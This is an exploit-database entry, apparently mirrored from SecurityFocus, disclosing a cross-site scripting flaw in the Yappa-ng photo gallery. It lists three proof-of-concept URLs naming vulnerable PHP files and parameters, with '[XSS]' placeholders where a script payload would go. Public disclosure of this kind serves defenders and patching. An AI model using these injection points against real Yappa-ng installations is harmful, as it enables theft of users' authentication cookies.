[] NeoSense
E X P L O I T S
title author type platform port cve id

Yappa-ng 1.x/2.x - Cross-Site Scripting

Author: GulfTech Security
type: webapps
platform: php
port: 
date_added: 2005-04-24 
date_updated: 2018-01-05 
verified: 1 
codes: BID: 13372;GTSA-00068 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/13372/info

yappa-ng is prone to an unspecified cross-site scripting vulnerability. This issue may allow for theft of cookie-based authentication credentials or other attacks.

The vendor has not published any specific details about this vulnerability other than stating that it is addressed in the 2.3.2 security release of the software.

http://www.example.com/admin_modules/admin_module_info.inc.php?lang_akt[admin_ainfo_hmain]=[XSS]
http://www.example.com/src/index_footer-copyright.inc.php?config[release]=[XSS]
http://www.example.com/src/index_thumbs.inc.php?page[thumb_table_width]=[XSS]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.